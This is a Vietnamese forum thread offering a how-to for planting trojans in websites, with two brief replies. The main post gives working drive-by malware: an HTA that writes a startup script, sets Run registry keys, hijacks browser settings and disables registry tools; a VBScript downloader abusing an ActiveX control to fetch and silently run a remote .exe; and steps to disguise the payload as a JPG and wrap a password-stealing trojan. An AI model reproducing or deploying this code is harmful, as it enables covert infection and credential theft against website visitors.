Hướng dẫn gắn Trojan

Go down

Hướng dẫn gắn Trojan

Bài gửi  Khang Joker on Thu 16 Jul - 15:32

Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>
Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

b, bạn copy vào notepad đoạn mã sau:
Code:
<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);�� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>
rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
Code:
<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame
<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe>
đoạn 2
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Cách 3 :
Đầu tiên , mọi người hãy Download Program rapidshare.com exe2vbs (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:
<script language=vbs>
vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth)
bằng
Code:
Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) </script> <HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ /> </head> <body onload=’window.close()’> </body> </html>
Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta
Code:
<center> <span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span> <xml id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html>
để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :
Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>
Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .

devuong

_________________
lol! Admin Khang Joker lol!
avatar
Khang Joker
Đế Vương - Khang Gia
Đế Vương - Khang Gia

Tổng số bài gửi : 17
Like : 1
Join date : 15/07/2015
Age : 18
Đến từ : Việt Nam

Xem lý lịch thành viên

Về Đầu Trang Go down

Re: Hướng dẫn gắn Trojan

Bài gửi  caotranminha on Mon 20 Jul - 15:15

copy trên gg à

caotranminha
Đế Vương - Mem
Đế Vương - Mem

Tổng số bài gửi : 6
Like : 0
Join date : 18/07/2015

Xem lý lịch thành viên

Về Đầu Trang Go down

Re: Hướng dẫn gắn Trojan

Bài gửi  hqvuongbl2013 on Mon 20 Jul - 17:44

Hay quá à hahahaa

hqvuongbl2013
Đế Vương - Mem
Đế Vương - Mem

Tổng số bài gửi : 2
Like : 0
Join date : 16/07/2015

Xem lý lịch thành viên

Về Đầu Trang Go down

Re: Hướng dẫn gắn Trojan

Bài gửi  Sponsored content


Sponsored content


Về Đầu Trang Go down

Về Đầu Trang


 
Permissions in this forum:
Bạn không có quyền trả lời bài viết